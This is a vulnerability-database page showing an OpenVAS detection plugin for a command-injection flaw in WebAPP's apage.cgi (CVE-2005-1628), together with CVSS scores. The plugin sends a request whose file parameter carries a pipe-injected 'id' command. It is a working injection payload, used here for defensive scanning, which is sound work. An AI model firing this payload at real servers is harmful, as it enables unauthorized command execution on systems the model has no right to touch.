Lucene search

K
openvasCopyright (C) 2005 David MaciejakOPENVAS:136141256231018292
HistoryNov 03, 2005 - 12:00 a.m.

WebAPP Apage.CGI remote command execution flaw

2005-11-0300:00:00
Copyright (C) 2005 David Maciejak
plugins.openvas.org
20

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.047 Low

EPSS

Percentile

92.7%

Due to a lack of user input validation, an attacker can exploit the

# SPDX-FileCopyrightText: 2005 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.18292");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_cve_id("CVE-2005-1628");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/13637");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_name("WebAPP Apage.CGI remote command execution flaw");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2005 David Maciejak");
  script_family("Web application abuses");
  script_dependencies("webapp_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("WebAPP/installed");

  script_tag(name:"solution", value:"Upgrade to WebAPP version 0.9.9.2 or newer.");

  script_tag(name:"summary", value:"Due to a lack of user input validation, an attacker can exploit the
  'apage.cgi' script in the version of WebAPP on the remote host to
  execute arbitrary commands on the remote host with the privileges of the web server.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");

port = http_get_port(default:80);

install = get_kb_item(string("www/", port, "/webapp"));
if (isnull(install))
  exit(0);

matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  dir = matches[2];

  http_check_remote_code(
                         unique_dir:dir,
                         check_request:"/mods/apage/apage.cgi?f=file.htm.|id|",
                         check_result:"uid=[0-9]+.*gid=[0-9]+.*",
                         command:"id"
                         );
}

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.047 Low

EPSS

Percentile

92.7%

Related for OPENVAS:136141256231018292